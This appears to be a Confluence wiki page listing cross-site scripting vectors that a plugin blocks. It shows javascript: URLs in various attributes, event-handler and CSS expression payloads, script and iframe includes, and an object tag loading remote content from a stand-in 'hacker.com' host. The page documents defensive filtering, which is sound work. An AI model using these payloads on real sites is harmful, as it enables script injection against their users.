Skip to end of banner
Go to start of banner

List of security vulnerabilities prevented

Skip to end of metadata
Go to start of metadata

You are viewing an old version of this page. View the current version.

Compare with Current View Page History

« Previous Version 4 Current »

  • Usage of <a> tag with the 'ahref' attribute:
<a href='javascript:alert("Test");'>Test 1</a>
<a href='javascript:alert("Test Vulnerability through a href unicode");'>Test 2</a>
(or)
[javascript:alert('Test Vulnerability through a href');]
  • Usage of javascript:
<script>alert('Test Vulnerability through script');</script>
  • Usage of script with include:
<script type="text/javascript" src="https://<somesite>/include.js"></script>
  • Usage if iframe with include:
<iframe src="https://bobswift.atlassian.com"></iframe>
  • Usage of 'onXxx' events irrespective of the tags:
<div style="padding: 20px; opacity: 0;height: 20px;" onmouseout="alert('Test Vulnerbility through onXxx events')"></div>
<img src="smiley.gif" alt="Smiley face" height="42" width="42" onerror="alert('No file found')">
  • Usage of script in the src attribute:
<img src="javascript:alert("XSS");">
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">
<input type="image" src="javascript:alert('XSS');">
  • Usage of script in the background attribute:
<body background="javascript:alert("XSS")">
<table background="javascript:alert('XSS')">
<td background="javascript:alert('XSS')">
  • Usage of link tag with href:
<link rel="stylesheet" href="javascript:alert('XSS');">
  • Usage of script in the style attribute:
<div style="background-image: url(javascript:alert('XSS'))">
<div style="width: expression(alert('XSS'));">
  • Usage of object with include:
<object type="text/x-scriptlet" data="http://hacker.com/xss.html">







  • No labels